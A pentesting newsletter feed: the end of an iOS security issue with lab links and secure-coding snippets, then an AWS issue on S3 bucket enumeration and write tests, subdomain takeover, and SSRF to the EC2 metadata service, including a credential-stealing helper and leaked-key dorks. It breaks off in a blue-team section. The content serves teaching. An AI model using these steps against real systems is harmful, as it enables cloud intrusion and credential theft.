**iGoat-Swift** is OWASP&apos;s take on a vulnerable iOS app. It&apos;s Swift-based, actively maintained, and has exercises covering the OWASP Mobile Top 10. Perfect for practicing modern iOS exploitation since most new apps are written in Swift anyway. Check it out at [github.com/OWASP/iGoat-Swift](https://github.com/OWASP/iGoat-Swift).

If you want something more realistic, **Damn Vulnerable Bank** simulates a banking app with real-world vulnerabilities. It has both Android and iOS versions, which is great if you&apos;re doing mobile security across platforms. Practice API security, authentication bypass, and insecure storage attacks in a realistic context. Find it at [github.com/rewanthtammana/Damn-Vulnerable-Bank](https://github.com/rewanthtammana/Damn-Vulnerable-Bank).

For techniques and payloads, bookmark the **HackTricks iOS Pentesting Guide**. It&apos;s a constantly updated collection of attack patterns and exploitation techniques. Way more practical than most documentation. Check it at [book.hacktricks.xyz/mobile-pentesting/ios-pentesting](https://book.hacktricks.xyz/mobile-pentesting/ios-pentesting).

And keep the **OWASP MASTG** (Mobile Application Security Testing Guide) handy. It&apos;s the official methodology with iOS-specific chapters and practical exercises. This should be your structured reference when you&apos;re doing professional assessments. Find it at [mas.owasp.org/MASTG](https://mas.owasp.org/MASTG/).


## 🔒 Secure Development Best Practices

**For Developers:**

**1. Use Keychain Correctly**
```objc
// Secure keychain storage
NSDictionary *query = @{
    (__bridge id)kSecClass: (__bridge id)kSecClassGenericPassword,
    (__bridge id)kSecAttrService: @&quot;com.example.app&quot;,
    (__bridge id)kSecAttrAccount: @&quot;user_token&quot;,
    (__bridge id)kSecValueData: tokenData,
    (__bridge id)kSecAttrAccessible: (__bridge id)kSecAttrAccessibleWhenUnlockedThisDeviceOnly  // SECURE
};
OSStatus status = SecItemAdd((__bridge CFDictionaryRef)query, NULL);
```

**2. Implement Proper Certificate Pinning**
```swift
// Using TrustKit
let trustKit = TrustKit(configuration: [
    kTSKPinnedDomains: [
        &quot;api.example.com&quot;: [
            kTSKPublicKeyHashes: [
                &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=&quot;,
                &quot;BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=&quot;  // Backup pin
            ]
        ]
    ]
])
```

**3. Obfuscate Sensitive Code**

Don&apos;t rely on obfuscation as your primary security mechanism. It buys you time, not safety. Use it as defense-in-depth alongside proper cryptography and secure storage. Tools like SwiftShield and iXGuard can help obfuscate Swift code, but remember that determined attackers will still reverse engineer your app.

**4. Implement Multi-Layered Jailbreak Detection**
```swift
func isJailbroken() -&gt; Bool {
    // Check 1: File system
    let paths = [&quot;/Applications/Cydia.app&quot;, &quot;/bin/bash&quot;, &quot;/usr/sbin/sshd&quot;]
    for path in paths {
        if FileManager.default.fileExists(atPath: path) { return true }
    }

    // Check 2: URL schemes
    if UIApplication.shared.canOpenURL(URL(string: &quot;cydia://&quot;)!) { return true }

    // Check 3: Sandbox escape
    let testPath = &quot;/private/test.txt&quot;
    do {
        try &quot;test&quot;.write(toFile: testPath, atomically: true, encoding: .utf8)
        try FileManager.default.removeItem(atPath: testPath)
        return true
    } catch {}

    return false
}
```

**5. Don&apos;t Store Secrets in Code**
```swift
// BAD
let apiKey = &quot;sk_live_XXXXXXXXXXXXXXXX&quot;

// GOOD
// Fetch from backend on first launch, store in keychain
```

**6. Use App Transport Security (ATS)**
```xml
&lt;!-- Info.plist --&gt;
&lt;key&gt;NSAppTransportSecurity&lt;/key&gt;
&lt;dict&gt;
    &lt;key&gt;NSAllowsArbitraryLoads&lt;/key&gt;
    &lt;false/&gt;  &lt;!-- Enforce HTTPS --&gt;
&lt;/dict&gt;
```

## 🎯 Key Takeaways

iOS security is restrictive but it&apos;s not magic. Sandboxing and code signing raise the bar compared to Android, sure. But misconfigurations and logic bugs are everywhere. Static analysis still finds hardcoded secrets, insecure storage, and vulnerable dependencies in production apps.

Frida is your most powerful tool for iOS testing. Hooking functions, bypassing checks, and extracting data at runtime gives you visibility that static analysis alone never will. And certificate pinning? Usually trivial to bypass with SSL Kill Switch, Objection, or a custom Frida script.

Jailbreak detection is the same story. Liberty Lite, Objection, or manual Frida hooks defeat most implementations. And keychain misconfigurations are common. Apps using weak accessibility attributes leak credentials from backups or jailbroken devices.

Here&apos;s the thing: you don&apos;t always need a jailbroken device. Static analysis works on any IPA you can get your hands on. Objection works on non-jailbroken devices for many tasks. And if you need the full capabilities of a jailbreak without the hardware, Corellium gives you virtual iOS devices in the cloud.

One more thing. Objective-C is easier to reverse than Swift because method names are preserved. But both are reversible with the right tools. Don&apos;t let Swift intimidate you.

Finally, defense-in-depth matters. Apps relying on single-layer protections (just pinning, or just jailbreak detection) fail immediately under scrutiny. Multiple complementary security controls actually create barriers. Keep that in mind whether you&apos;re testing or building.

## 📚 Further Reading

- **[OWASP Mobile Application Security Testing Guide](https://mas.owasp.org/MASTG/)**: Comprehensive iOS security testing methodology
- **[HackTricks iOS Pentesting](https://book.hacktricks.xyz/mobile-pentesting/ios-pentesting)**: Extensive collection of iOS attack techniques and payloads
- **[iOS Application Security](https://www.amazon.com/iOS-Application-Security-Definitive-Hackers/dp/1593276028)** (Book): The definitive guide to iOS security by David Thiel
- **[Hacking and Securing iOS Applications](https://www.amazon.com/Hacking-Securing-iOS-Applications-Hijacking/dp/1449318746)** (Book): Practical iOS security techniques
- **[Frida CodeShare](https://codeshare.frida.re/)**: Community-contributed Frida scripts for iOS
- **[iOS Security Guide](https://support.apple.com/guide/security/welcome/web)** (Apple): Official documentation on iOS security architecture
- **[Corellium Documentation](https://support.corellium.com/)**: Virtual iOS device testing guides

---

That&apos;s it for this week!

If you&apos;ve been testing Android apps but avoiding iOS, the barrier to entry is lower than you think. Start with DVIA-v2 on the simulator. Practice static analysis with Ghidra. Get comfortable with Frida and Objection. When you&apos;re ready, invest in a jailbroken device (or Corellium subscription) and expand your capabilities.

The techniques overlap with Android (Frida, certificate pinning bypass, insecure storage) but the tooling and ecosystem are different. Give yourself time to learn the Apple-specific quirks. Once you do, you&apos;ll find iOS apps have just as many vulnerabilities as Android apps.

Thanks for reading, and happy hacking 📱

— Ruben</content:encoded><category>Newsletter</category><category>mobile-security</category><author>Ruben Santos</author></item><item><title>AWS for Pentesters: Your First Steps into Cloud Hacking</title><link>https://www.kayssel.com/newsletter/issue-28</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-28</guid><description>A beginner-friendly introduction to AWS security testing, from S3 buckets and metadata services to your first cloud foothold</description><pubDate>Sun, 14 Dec 2025 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

I&apos;ll be honest. I&apos;m writing this newsletter because I need to learn AWS myself.

I&apos;m currently working on a project that involves cloud infrastructure, and I can&apos;t keep avoiding AWS anymore. For the longest time, I stayed in my comfort zone (web apps, APIs, smart contracts) but cloud security? That felt like a different world. IAM, EC2, S3, VPC, KMS, Lambda... it&apos;s overwhelming when you&apos;re starting from zero.

But here&apos;s the thing: I can&apos;t audit what I don&apos;t understand. And judging by the number of cloud breaches I keep reading about (Capital One, Uber, countless exposed S3 buckets), this knowledge is essential for modern pentesting.

So I&apos;m taking the approach I always do when learning something new: I document it and share it. This newsletter is as much for me as it is for you. I&apos;m breaking down AWS security from the perspective of someone who&apos;s never touched it before, because that&apos;s exactly where I am.

What I&apos;ve learned so far is encouraging: **you don&apos;t need to be a cloud architect to find cloud vulnerabilities**. Most AWS security issues aren&apos;t about complex IAM policies or sophisticated privilege escalation chains. They&apos;re misconfigurations. Public S3 buckets. Exposed metadata services. Overly permissive policies. The kind of stuff you can find with basic reconnaissance and a few simple commands.

The barrier to entry is low. You don&apos;t need an AWS account to test many attack vectors. And the free tier is enough to set up your own vulnerable environments for practice.

If you&apos;re in the same boat (comfortable with traditional pentesting but intimidated by cloud) this is your starting point. Let&apos;s learn this together.

In this issue, I&apos;ll cover:
- **AWS basics for pentesters** (regions, services, IAM fundamentals)
- **S3 bucket enumeration and exploitation** (the most common cloud vulnerability)
- **SSRF to AWS metadata service** (stealing credentials from EC2 instances)
- **Basic AWS reconnaissance** (finding cloud resources from external perspective)
- **Tools and techniques** for cloud security testing
- **Hands-on labs** to practice these skills

No prior cloud experience required; everything below assumes you&apos;re starting from zero.

Let&apos;s get started 👇

## ☁️ AWS 101: What Pentesters Need to Know

Before breaking things, let&apos;s understand what you&apos;re dealing with.

### What is AWS?

Amazon Web Services (AWS) is a cloud computing platform. Instead of companies running their own servers, they rent virtual machines, storage, and services from Amazon&apos;s data centers.

Think of it like this:
- **Traditional infrastructure**: Company buys servers, racks them, manages networking, storage, backups, etc.
- **Cloud infrastructure**: Company clicks a button, AWS provisions a server in seconds, company pays by the hour

For pentesters, this means:
- **Target infrastructure is dynamic**: Servers spin up and down constantly
- **Misconfigurations are common**: Developers often prioritize speed over security
- **Attack surface is public**: Many services have public endpoints by default

### Key AWS Services (Security Perspective)

You don&apos;t need to memorize all 200+ AWS services. Focus on these:

**S3 (Simple Storage Service)**: Object storage. Think Dropbox for developers. Files are stored in &quot;buckets&quot; that can be public or private. **Most common misconfiguration in AWS.**

**EC2 (Elastic Compute Cloud)**: Virtual machines. Servers running in AWS. Can be Linux or Windows.

**IAM (Identity and Access Management)**: Controls who can do what in AWS. Users, roles, policies. Critical for understanding privilege escalation.

**Lambda**: Serverless functions. Code that runs without a dedicated server. Can have overly permissive permissions.

**RDS (Relational Database Service)**: Managed databases (MySQL, PostgreSQL, etc.). Sometimes publicly accessible.

**CloudFront**: Content Delivery Network (CDN). Can lead to subdomain takeovers.

**Route 53**: DNS service. Useful for reconnaissance.

### AWS Regions and Availability Zones

AWS is organized geographically:

- **Region**: A physical location with multiple data centers (e.g., `us-east-1` = Northern Virginia, `eu-west-1` = Ireland)
- **Availability Zone (AZ)**: Individual data centers within a region

**Why this matters for pentesters:**
- Resources in different regions are isolated
- S3 bucket names are global, but buckets themselves are region-specific
- When enumerating, you might need to check multiple regions

Common regions:
- `us-east-1`: US East (N. Virginia) - **Most common, default for many services**
- `us-west-2`: US West (Oregon)
- `eu-west-1`: Europe (Ireland)
- `ap-southeast-1`: Asia Pacific (Singapore)

### IAM: The Backbone of AWS Security

IAM controls access in AWS. Understanding IAM is essential for cloud pentesting.

**IAM Components:**

**Users**: Individual accounts (e.g., `john@company.com`)

**Groups**: Collections of users with shared permissions

**Roles**: Identity that AWS resources can assume (e.g., EC2 instance role)

**Policies**: JSON documents that define permissions

**Example IAM Policy:**
```json
{
  &quot;Version&quot;: &quot;2012-10-17&quot;,
  &quot;Statement&quot;: [
    {
      &quot;Effect&quot;: &quot;Allow&quot;,
      &quot;Action&quot;: &quot;s3:GetObject&quot;,
      &quot;Resource&quot;: &quot;arn:aws:s3:::my-bucket/*&quot;
    }
  ]
}
```

This policy allows reading objects from the bucket `my-bucket`.

**Key IAM Concepts:**

- **ARN (Amazon Resource Name)**: Unique identifier for AWS resources
  - Format: `arn:aws:service:region:account-id:resource`
  - Example: `arn:aws:s3:::my-bucket`

- **Principal**: Entity making the request (user, role, service)

- **Permissions boundary**: Maximum permissions a user can have

**From an attacker perspective:**
- Misconfigured IAM policies can grant excessive permissions
- Roles with overly broad permissions are gold
- Credential leaks (access keys) are common

### AWS Access Credentials

There are two types of credentials:

**1. Root Account Credentials**:
- Email and password for the AWS account
- **Full access to everything**
- Should never be used for day-to-day operations (but often is)

**2. IAM Access Keys**:
- Programmatic access credentials
- Consist of:
  - **Access Key ID**: Like a username (e.g., `AKIAIOSFODNN7EXAMPLE`)
  - **Secret Access Key**: Like a password (e.g., `wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY`)

**Long-term access keys start with `AKIA`** (IAM users, root account). If you see `AKIA` in source code, logs, or JavaScript, that&apos;s an AWS access key leak.

**Temporary access keys start with `ASIA`**. These come from the Security Token Service (STS):
- Expire after 15 minutes to 12 hours
- Consist of an Access Key ID, Secret Access Key, and **Session Token**
- The session token is required for every API call made with them
- Commonly issued to EC2 instance roles, Lambda functions, and federated users
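Those prefixes make leaked keys easy to grep for. A minimal scanner sketch (the regex covers the standard 20-character key ID format; it will not catch every credential type):

```python
import re

# Access key IDs are 20 characters: a 4-character prefix plus 16
# upper-case alphanumerics. AKIA = long-term, ASIA = temporary (STS).
KEY_ID_RE = re.compile(r"\b(AKIA|ASIA)[A-Z0-9]{16}\b")

def find_key_ids(text):
    # Returns (prefix, full key id) pairs for every match
    return [(m.group(1), m.group(0)) for m in KEY_ID_RE.finditer(text)]
```

Run it over JavaScript bundles, `.env` files, and git history dumps.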

## 🪣 S3 Buckets: The Low-Hanging Fruit

S3 is the most common attack vector in AWS. Why? Because it&apos;s easy to misconfigure and the impact is often massive.

### What Makes S3 Dangerous?

S3 buckets can be:
- **Public**: Anyone on the internet can list and download files
- **Authenticated**: Only AWS users can access
- **Private**: Only specific IAM users/roles can access

The problem? Developers often make buckets public by accident or &quot;temporarily&quot; and forget to lock them down.

### S3 Bucket URL Formats

Buckets can be accessed via multiple URL formats:

**Path-style** (legacy):
```
https://s3.amazonaws.com/bucket-name/file.txt
https://s3-region.amazonaws.com/bucket-name/file.txt
```

**Virtual-hosted style** (current standard):
```
https://bucket-name.s3.amazonaws.com/file.txt
https://bucket-name.s3-region.amazonaws.com/file.txt
```

**Website hosting**:
```
http://bucket-name.s3-website-region.amazonaws.com/
http://bucket-name.s3-website.region.amazonaws.com/
```

### Finding S3 Buckets

**1. Look for S3 URLs in Target Applications**

Check:
- JavaScript files
- Image/CSS/font URLs
- API responses
- Mobile app decompilation
- HTML source code

Example finding:
```javascript
// Found in app.js
const API_URL = &quot;https://company-api-prod.s3.amazonaws.com/config.json&quot;;
```

**2. Enumerate Based on Company Name**

S3 bucket names are globally unique and often follow patterns:

Common naming patterns:
```
company-name
company-name-prod
company-name-dev
company-name-staging
company-uploads
company-backups
company-logs
company-assets
company-static
www.company.com
dev.company.com
```

**3. Subdomain Enumeration**

Use subdomain enumeration tools and check if subdomains point to S3:

```bash
# Using amass
amass enum -d target.com -o subdomains.txt

# Check each subdomain for S3
while read sub; do
  host $sub | grep -i &quot;s3&quot;
done &lt; subdomains.txt
```

If you see:
```
dev.company.com is an alias for dev-company.s3.amazonaws.com
```

That&apos;s an S3 bucket.

### Testing S3 Bucket Access

Once you find a bucket name, test if it&apos;s accessible:

**Method 1: Browser**

Try accessing:
```
https://bucket-name.s3.amazonaws.com/
```

If you get an XML listing, it&apos;s public:
```xml
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;ListBucketResult&gt;
  &lt;Name&gt;bucket-name&lt;/Name&gt;
  &lt;Contents&gt;
    &lt;Key&gt;file1.txt&lt;/Key&gt;
    ...
  &lt;/Contents&gt;
&lt;/ListBucketResult&gt;
```

If you get `AccessDenied`, it exists but isn&apos;t publicly listable (might still have public files).

If you get `NoSuchBucket`, it doesn&apos;t exist.
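The three outcomes map cleanly to code. A sketch of a response classifier (`classify_bucket` is a hypothetical helper: feed it the status code and body from any HTTP client):

```python
def classify_bucket(status, body):
    # Interpret an anonymous GET to https://bucket-name.s3.amazonaws.com/
    if status == 200 and "ListBucketResult" in body:
        return "public: listable, contents exposed"
    if status == 403 or "AccessDenied" in body:
        return "exists: listing denied (individual objects may still be public)"
    if status == 404 or "NoSuchBucket" in body:
        return "does not exist (takeover candidate if DNS points here)"
    return "unknown"
```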

**Method 2: AWS CLI**

Install AWS CLI (no credentials needed for public buckets):

```bash
# List bucket contents
aws s3 ls s3://bucket-name --no-sign-request

# Download a file
aws s3 cp s3://bucket-name/file.txt ./file.txt --no-sign-request

# Sync entire bucket
aws s3 sync s3://bucket-name ./local-folder --no-sign-request
```

The `--no-sign-request` flag attempts anonymous access.

### S3 Permissions: Read vs Write

Buckets can have different permission combinations:

**Public Read**: Can list and download files (most common misconfiguration)

**Public Write**: Can upload files (rare but critical)

Test write access:
```bash
# Try to upload a file
echo &quot;test&quot; &gt; test.txt
aws s3 cp test.txt s3://bucket-name/test.txt --no-sign-request
```

If successful, you can:
- Upload HTML or JavaScript to buckets that serve web content (defacement, stored XSS)
- Overwrite files that other systems download and trust (configs, installers, scripts)
- Inject malicious content

**Public Read ACL**: Can read the bucket&apos;s access control list

```bash
aws s3api get-bucket-acl --bucket bucket-name --no-sign-request
```

### Real-World S3 Exploitation Examples

**Scenario 1: Public Backup Bucket**

```bash
aws s3 ls s3://company-backups --no-sign-request

# Output:
# database-backup-2025-12-01.sql.gz
# application-secrets.env
# id_rsa
```

You just found database backups, environment variables with API keys, and SSH private keys.

**Scenario 2: Public Upload Bucket with Website Hosting**

```bash
# Check if bucket hosts a static website
curl http://company-uploads.s3-website-us-east-1.amazonaws.com

# S3 website hosting serves static files only, so a PHP shell won&apos;t execute.
# Upload an HTML page instead (defacement / stored XSS on the serving domain)
echo &apos;&lt;script&gt;alert(document.domain)&lt;/script&gt;&apos; &gt; poc.html
aws s3 cp poc.html s3://company-uploads/poc.html --no-sign-request

# Access it
curl http://company-uploads.s3-website-us-east-1.amazonaws.com/poc.html
```

**Scenario 3: Subdomain Takeover via S3**

If a DNS record points to a non-existent S3 bucket, you can create it and take over the subdomain:

```
dev.company.com CNAME dev-company.s3.amazonaws.com
```

If `dev-company` bucket doesn&apos;t exist, create it:

```bash
aws s3 mb s3://dev-company --region us-east-1
echo &quot;Subdomain Takeover PoC&quot; &gt; index.html
aws s3 cp index.html s3://dev-company/index.html
aws s3 website s3://dev-company --index-document index.html
```

Now `dev.company.com` serves your content.

**Impact**: Phishing, XSS (if parent domain cookies aren&apos;t properly scoped), reputation damage.

## 🔍 EC2 Metadata Service: SSRF to Credentials

If you find an SSRF (Server-Side Request Forgery) vulnerability in an application running on AWS EC2, you can steal credentials.

**Note**: For a comprehensive guide on finding and exploiting SSRF vulnerabilities, check out [Issue 4: Inside the Request - From Basic SSRF to Internal Takeover](/post/issue-4), where I cover SSRF fundamentals, detection techniques, and exploitation methods. This section focuses specifically on exploiting SSRF in AWS environments to access the metadata service.

### What is the EC2 Metadata Service?

Every EC2 instance has access to a special internal endpoint that provides metadata about the instance:

```
http://169.254.169.254/
```

This endpoint is **only accessible from within the EC2 instance**. External users can&apos;t reach it directly. But if the application has SSRF, you can.

### What&apos;s Available in Metadata?

The metadata service exposes:
- Instance details (AMI ID, instance type, region)
- **IAM role credentials** (if the instance has a role attached)
- User data (startup scripts, sometimes contains secrets)
- Network information

**Why this matters:**
- If the EC2 instance has an IAM role, you can steal temporary credentials
- Those credentials grant whatever permissions the role has
- Common scenario: EC2 role has S3 read/write, database access, Lambda invoke, etc.

### Metadata Service Versions

**IMDSv1** (Instance Metadata Service Version 1):
- Simple HTTP GET requests
- No authentication required
- Easy to exploit via SSRF

**IMDSv2** (Instance Metadata Service Version 2):
- Requires a session token
- Token obtained via HTTP PUT with custom header
- Harder to exploit (but still possible)

### Exploiting IMDSv1 via SSRF

Assume you found an SSRF vulnerability where you can control a URL parameter:

```
https://target.com/api/fetch?url=&lt;YOUR_URL&gt;
```

**Step 1: Confirm Metadata Access**

```
https://target.com/api/fetch?url=http://169.254.169.254/latest/meta-data/
```

If you get a response like:
```
ami-id
hostname
iam/
instance-id
local-ipv4
public-ipv4
```

You&apos;ve hit the metadata service.

**Step 2: Check for IAM Role**

```
https://target.com/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
```

If the instance has a role, you&apos;ll see the role name:
```
web-server-role
```

**Step 3: Retrieve Credentials**

```
https://target.com/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/web-server-role
```

Response:
```json
{
  &quot;AccessKeyId&quot;: &quot;ASIAXXXXXXXXXXX&quot;,
  &quot;SecretAccessKey&quot;: &quot;wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY&quot;,
  &quot;Token&quot;: &quot;IQoJb3JpZ2luX2VjEH...&quot;,
  &quot;Expiration&quot;: &quot;2025-12-14T12:00:00Z&quot;
}
```

You now have temporary AWS credentials; the `ASIA` prefix confirms they came from STS.
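Steps 2 and 3 chain together naturally. A sketch, where `ssrf_fetch` is a stand-in for whatever request primitive your SSRF gives you (hypothetical callable, not a real library):

```python
import json

CREDS_URL = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

def steal_role_creds(ssrf_fetch):
    # ssrf_fetch(url) is assumed to return the response body as a string
    role = ssrf_fetch(CREDS_URL).strip().splitlines()[0]
    creds = json.loads(ssrf_fetch(CREDS_URL + role))
    return {
        "role": role,
        "AWS_ACCESS_KEY_ID": creds["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": creds["SecretAccessKey"],
        "AWS_SESSION_TOKEN": creds["Token"],
    }
```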

**Step 4: Use the Credentials**

Export them locally:
```bash
export AWS_ACCESS_KEY_ID=&quot;ASIAXXXXXXXXXXX&quot;
export AWS_SECRET_ACCESS_KEY=&quot;wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY&quot;
export AWS_SESSION_TOKEN=&quot;IQoJb3JpZ2luX2VjEH...&quot;
```

Test what permissions you have:
```bash
# Check identity
aws sts get-caller-identity

# List S3 buckets
aws s3 ls

# Enumerate permissions (requires additional tools)
```

**Step 5: Enumerate Permissions**

Once you have credentials, you need to discover what permissions they have. You can brute-force IAM permissions using enumeration tools (covered in the Tools section below) to systematically test what actions the role can perform.

### Exploiting IMDSv2

IMDSv2 requires a token. To get the token, you must:

1. Send a PUT request to `/latest/api/token` with header `X-aws-ec2-metadata-token-ttl-seconds`
2. Use the returned token in subsequent requests with header `X-aws-ec2-metadata-token`

**Challenge:** Most SSRF vulnerabilities only allow GET requests, not PUT.

**Workarounds:**
- If the SSRF lets you control both the HTTP verb and request headers, you can complete the token handshake
- Some SSRF bypasses allow HTTP verb tampering
- Look for chained vulnerabilities (SSRF + CRLF injection to smuggle the PUT and its headers)

Example with custom headers (if allowed):
```
PUT /latest/api/token HTTP/1.1
Host: 169.254.169.254
X-aws-ec2-metadata-token-ttl-seconds: 21600
```
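To make the handshake concrete, a sketch that builds the two raw HTTP requests (`imdsv2_requests` is a hypothetical helper; `TOKEN` is a placeholder for the value the PUT returns):

```python
def imdsv2_requests(path="/latest/meta-data/iam/security-credentials/", ttl=21600):
    # Two-step handshake: the PUT mints a session token, then every
    # metadata read presents it in a header.
    put = ("PUT /latest/api/token HTTP/1.1\r\n"
           "Host: 169.254.169.254\r\n"
           "X-aws-ec2-metadata-token-ttl-seconds: " + str(ttl) + "\r\n\r\n")
    get = ("GET " + path + " HTTP/1.1\r\n"
           "Host: 169.254.169.254\r\n"
           "X-aws-ec2-metadata-token: TOKEN\r\n\r\n")
    return put, get
```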

### User Data Exposure

EC2 instances can have &quot;user data&quot; scripts that run on startup. These sometimes contain secrets:

```
http://169.254.169.254/latest/user-data
```

Response might include:
```bash
#!/bin/bash
export DB_PASSWORD=&quot;super_secret_password&quot;
export API_KEY=&quot;sk_live_XXXXXXX&quot;
```

## 🔎 AWS Reconnaissance from External Perspective

You don&apos;t need AWS credentials to enumerate resources. Here&apos;s what you can find from outside.

### DNS Enumeration

Find subdomains that point to AWS services:

```bash
# Subdomain enumeration
amass enum -d target.com -o subs.txt
subfinder -d target.com -o subs.txt

# Check for AWS services
while read sub; do
  dig $sub | grep -E &apos;s3|cloudfront|elb|ec2&apos;
done &lt; subs.txt
```

Look for:
- **S3**: `s3.amazonaws.com`, `s3-website`
- **CloudFront**: `cloudfront.net`
- **ELB (Load Balancer)**: `elb.amazonaws.com`, `amazonaws.com`
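A quick classifier sketch for triaging resolved CNAMEs (the pattern list covers the common hostname forms above, not every regional variant):

```python
AWS_PATTERNS = [
    ("cloudfront.net", "CloudFront"),
    ("elb.amazonaws.com", "ELB"),
    ("s3-website", "S3 static website"),  # check before the plain S3 match
    (".s3.amazonaws.com", "S3"),
]

def classify_cname(cname):
    # Normalize: lower-case, strip the trailing dot dig appends
    c = cname.lower().rstrip(".")
    for needle, service in AWS_PATTERNS:
        if needle in c:
            return service
    return None
```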

### Certificate Transparency Logs

Services like **[crt.sh](https://crt.sh)** and **[Censys](https://censys.io)** index SSL certificates. AWS services often appear here:

```bash
curl -s &quot;https://crt.sh/?q=%.target.com&amp;output=json&quot; | jq -r &apos;.[].name_value&apos; | sort -u
```

Look for S3 bucket names in certificate SANs.

### Shodan and Censys

Search for AWS-related services:

**Shodan queries:**
```
org:&quot;Amazon.com&quot; hostname:target.com
&quot;Access Key ID&quot; &quot;Secret Access Key&quot;
```

**Censys queries:**
```
parsed.names:target.com and tags:s3
```

### GitHub and Code Search

Developers often commit AWS credentials and bucket names:

**GitHub Dorks:**
```
org:target-company &quot;AKIA&quot;
org:target-company &quot;ASIA&quot;
org:target-company &quot;aws_secret_access_key&quot;
org:target-company &quot;s3.amazonaws.com&quot;
filename:.env &quot;AWS&quot;
```

Use automated secret scanning tools (covered in Tools section) to efficiently scan repositories for leaked credentials.

### Network Reconnaissance

Scan for open ports on EC2 instances:

```bash
# Find EC2 IP ranges for a region
curl -s https://ip-ranges.amazonaws.com/ip-ranges.json | \
  jq -r &apos;.prefixes[] | select(.region==&quot;us-east-1&quot; and .service==&quot;EC2&quot;) | .ip_prefix&apos;

# Scan target IPs
nmap -sV -p 22,80,443,3389,3306,5432,6379,27017 target-ip
```

Common misconfigurations:
- Port 22 (SSH) open to `0.0.0.0/0`
- Port 3306 (MySQL) or 5432 (PostgreSQL) publicly accessible
- Port 6379 (Redis) without authentication

## 🛠️ Essential Tools for AWS Pentesting

### Reconnaissance and Enumeration

**[ScoutSuite](https://github.com/nccgroup/ScoutSuite)**: Multi-cloud security auditing tool

```bash
pip install scoutsuite
scout aws --profile &lt;profile-name&gt;
```

Generates an HTML report with findings across IAM, S3, EC2, RDS, etc.

**[Prowler](https://github.com/prowler-cloud/prowler)**: AWS security assessment tool

```bash
pip install prowler
prowler aws --compliance cis_2.0
```

**[CloudMapper](https://github.com/duo-labs/cloudmapper)**: Visualize AWS environments

```bash
git clone https://github.com/duo-labs/cloudmapper
cd cloudmapper
python cloudmapper.py collect --account my-account
python cloudmapper.py prepare --account my-account
python cloudmapper.py webserver
```

### Exploitation and Post-Exploitation

**[Pacu](https://github.com/RhinoSecurityLabs/pacu)**: AWS exploitation framework (like Metasploit for AWS)

```bash
git clone https://github.com/RhinoSecurityLabs/pacu
cd pacu
bash install.sh
python pacu.py
```

Features:
- Privilege escalation modules
- Credential harvesting
- Service enumeration
- Data exfiltration

**[WeirdAAL](https://github.com/carnal0wnage/weirdAAL)**: AWS attack library

```bash
git clone https://github.com/carnal0wnage/weirdAAL
cd weirdAAL
python weirdAAL.py -m list_modules
```

### S3 Bucket Enumeration

**[S3Scanner](https://github.com/sa7mon/S3Scanner)**: Check S3 bucket permissions

```bash
pip install s3scanner
s3scanner scan --buckets-file bucket-names.txt
```

**[cloud_enum](https://github.com/initstring/cloud_enum)**: Multi-cloud OSINT tool

```bash
python3 cloud_enum.py -k company-name
```

**[bucket-stream](https://github.com/eth0izzle/bucket-stream)**: Real-time S3 bucket discovery from certificate transparency logs

**[slurp](https://github.com/0xbharath/slurp)**: S3 bucket enumerator

```bash
slurp domain -t company.com
```

**[AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump)**: S3 bucket enumeration and download tool

```bash
python AWSBucketDump.py -l bucket-names.txt -g
```

### IAM Permission Enumeration

**[enumerate-iam](https://github.com/andresriancho/enumerate-iam)**: Brute-force IAM permissions

```bash
python enumerate-iam.py --access-key ASIAXXX --secret-key wJalr... --session-token IQoJ...
```

### Credential Scanning

**[GitLeaks](https://github.com/gitleaks/gitleaks)**: Find secrets in git repos

```bash
gitleaks detect --source . --report-path report.json
```

**[TruffleHog](https://github.com/trufflesecurity/trufflehog)**: High-entropy string scanner

```bash
trufflehog git https://github.com/target/repo
```

**[GitRob](https://github.com/michenriksen/gitrob)**: Find sensitive files in GitHub organizations

### AWS CLI Essentials

The AWS CLI is your best friend:

```bash
# Install
pip install awscli

# Configure (if you have credentials)
aws configure

# Basic commands
aws sts get-caller-identity  # Who am I?
aws s3 ls                     # List S3 buckets
aws ec2 describe-instances    # List EC2 instances
aws iam list-users            # List IAM users
aws iam get-user              # Get current user details
```

## 🧪 Hands-On Labs

Practice safely in controlled environments:

### [flAWS.cloud](http://flaws.cloud/)

**Free AWS security challenges:**
- Level 1: Find S3 bucket contents
- Level 2: Publicly exposed S3 bucket with credentials
- Level 3: EC2 metadata service exploitation
- Level 4-6: Advanced privilege escalation

**No AWS account required for early levels.**

### [flAWS2.cloud](http://flaws2.cloud/)

Sequel to flAWS with defender and attacker paths.

### [CloudGoat](https://github.com/RhinoSecurityLabs/cloudgoat)

**Vulnerable-by-design AWS infrastructure:**

```bash
git clone https://github.com/RhinoSecurityLabs/cloudgoat
cd cloudgoat
pip install -r requirements.txt
python cloudgoat.py config profile
python cloudgoat.py config whitelist --auto
python cloudgoat.py create iam_privesc_by_rollback
```

**Requires your own AWS account** (uses free tier resources).

Scenarios include:
- IAM privilege escalation
- Lambda function exploitation
- EC2 SSRF to metadata
- S3 bucket enumeration

### [TryHackMe - AWS Security](https://tryhackme.com/)

Search for &quot;AWS&quot; on TryHackMe for guided rooms.

### [PentesterLab - AWS Badge](https://pentesterlab.com/badges/aws)

Paid platform with structured AWS security exercises.

## 🔒 Detection and Defense

### For Blue Teams

**1. Monitor CloudTrail Logs**

AWS CloudTrail logs all API calls. Enable it and monitor for:
- `GetObject` on sensitive S3 buckets from unknown IPs
- `AssumeRole` from unexpected sources
- Failed authentication attempts
- Enumeration activities (rapid `Describe*` calls)
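
Recent API activity can be pulled straight from the CLI. This sketch (event name, result count, and output fields are illustrative; requires valid credentials) lists recent `AssumeRole` calls from the 90-day lookup window:

```bash
# List recent AssumeRole events from CloudTrail
aws cloudtrail lookup-events \
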